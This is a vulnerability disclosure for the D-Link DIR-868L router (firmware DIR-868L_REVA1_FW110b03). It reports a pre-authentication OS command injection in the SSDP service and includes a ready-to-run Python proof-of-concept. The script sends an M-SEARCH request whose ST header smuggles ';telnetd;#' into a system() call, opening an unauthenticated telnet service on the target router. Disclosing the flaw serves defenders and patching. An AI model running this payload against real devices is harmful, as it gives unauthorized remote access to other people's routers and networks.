[PRODUCT]
D-LINK
[Vendor of Product]
[VERSION]
DIR-868L_REVA1_FW110b03
[Vulnerability Type]
os command injection
[Description]
The D-Link DIR-868L_REVA1_FW110b03 was found to contain a pre-auth os command injection vulnerability in the ssdp service function through the request header parameter.
when we control the ST parameter pass the if segment, the other parameter will enter the sub_1BF84 function
in sub_1BF84 function, parameter will splice in string s, and call system with parameter s
import socket, sys, time
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target_ip>")
sys.exit(1)
target_ip = sys.argv[1]
# Send SSDP request
payload = f"M-SEARCH * HTTP/1.1\\r\\nHOST: {target_ip}:1900\\r\\nST: uuid:2222;telnetd;#\\r\\nMAN: \\"ssdp:discover\\"\\r\\nMX: 2\\r\\n\\r\\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
try:
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.sendto(payload.encode(), (target_ip, 1900))
print(f"[INFO] Sent malicious SSDP request to {target_ip}:1900")
finally:
sock.close()
